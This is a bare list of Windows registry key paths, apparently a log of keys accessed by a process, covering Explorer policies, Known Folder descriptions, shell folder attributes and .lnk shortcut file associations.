HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
\xe4\xa4\x90\xe3\x84\x80
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\UserChoice
HKEY_CLASSES_ROOT\lnkfile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject
HKEY_CLASSES_ROOT\SystemFileAssociations\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{00021490-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
